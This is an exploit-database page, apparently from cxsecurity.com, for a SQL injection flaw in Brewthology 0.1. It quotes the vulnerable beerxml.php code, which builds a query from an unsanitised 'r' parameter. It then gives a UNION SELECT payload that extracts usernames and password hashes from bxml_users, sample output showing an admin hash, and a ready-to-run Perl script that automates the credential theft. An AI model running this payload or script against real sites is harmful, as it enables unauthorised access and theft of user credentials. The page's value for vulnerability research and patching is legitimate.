Brewthology 0.1 SQL Injection

2013.02.27
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#Brewthology 0.1 SQL Injection Exploit #By cr4wl3r http://bastardlabs.info #Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/ #Demo: http://bastardlabs.info/demo/brewthology.png #Tested: Win 7 # # Bugs found in beerxml.php # # if (isset($_GET['r'])) # { # $recipenum = $_GET['r']; # # // Pull Data from DB # $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum"; # $recresult = @mysql_query ($recipes); # } # # http://bastardlabs/[path]/beerxml.php?r=[SQLi] # Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users # # # $ perl brewthology.pl localhost /demo/ # [+] Please Wait ... # # [+] Getting Username and Password [ ok ] # [+] w00tw00t # [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1 #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; if (@ARGV < 2) { print qq( +---------------------------------------------+ | Brewthology 0.1 SQL Injection Exploit | | | | coded & exploited by cr4wl3r | | http://bastardlabs.info/ | +---------------------------------------------+ -=[X]=- +--------------------------------------- Usage : perl $0 <host> <path> ex : perl $0 127.0.0.1 /Brewthology/ +--------------------------------------- ); } $target = "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n"; print "[+] Please Wait ...\n"; print $sock "GET $target HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: BastardLabs\n"; print $sock "Host: $host\n"; print $sock "Connection: close\n\n"; sleep 2; while ($answer = <$sock>) { if ($answer =~ /<USE>(.*?)<\/USE>/) { print "\n[+] Getting Username and Password [ ok ]\n"; sleep 1; print "[+] w00tw00t\n"; print "[+] Username | Password --> $1\n"; exit(); } } print "[-] Exploit Failed !\n";

References:

http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/
http://bastardlabs.info/demo/brewthology.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top